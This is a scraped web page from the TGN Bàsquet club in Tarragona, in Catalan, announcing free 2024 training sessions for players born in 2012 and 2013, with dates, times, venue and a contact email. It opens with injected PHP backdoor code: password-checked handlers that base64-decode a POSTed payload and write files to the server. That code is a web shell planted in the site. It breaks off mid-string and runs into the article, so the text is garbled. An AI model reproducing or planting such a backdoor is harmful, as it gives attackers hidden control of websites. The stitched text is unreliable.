function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tornen les tecnificacions d'Alevins al TGN Bàsquet! - Tgn Bàsquet Club -

Tornen les tecnificacions d’Alevins al TGN Bàsquet!

By
Updated: febrer 6, 2024

Arriba una nova edició de les tecnificacions gratuïtes que ofereix el TGN Bàsquet per als jugadors i jugadores alevins de bàsquet (nascuts l’any 2012 i 2013). Aquest any hi haurà tres oportunitats d’assistir a les tecnificacions que organitza el Club: el diumenge 18 de febrer, el diuemnge 17 de març, el diumenge 14 d’abril i i el diumenge 5 de maig al Pavelló del Sagrat Cor.

El TGN Bàsquet fa anys que aposta per fer aquests entrenaments adreçats no només als jugadors i jugadores de la casa, sinó també a aquells alevins de fora que vulguin millorar les seves qualitats en aquest esport que tant ens agrada. En les tecnificacions els jugadors aniran passant per una sèrie d’estacions on es treballaran aspectes concrets del bàsquet sota la supervisió d’entrenadors i entrenadores del TGN.

La tecnificació es farà en dos torns. A les 10h del matí: els Alevins de 5è (nascuts 2013) i a les 11.30h els Alevins de 6è (nascuts 2012). La durada prevista de l’activitat és d’una hora i mitja. L’accés és gratuït i es farà al Pavelló del Sagrat Cor, que està a l’Avinguda Marquès de Montoliu de Tarragona.

L’accés és gratuït i serà necessària la confirmació prèvia de l’assistència pels jugadors de fora del club (els jugadors/es del TGN no han de fer-ho!) via correu electrònic:  administracio@tgnbasquet.com, per tal de controlar el nombre de jugadors i jugadores de fora del club que vindran.

Animeu-vos a participar!

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *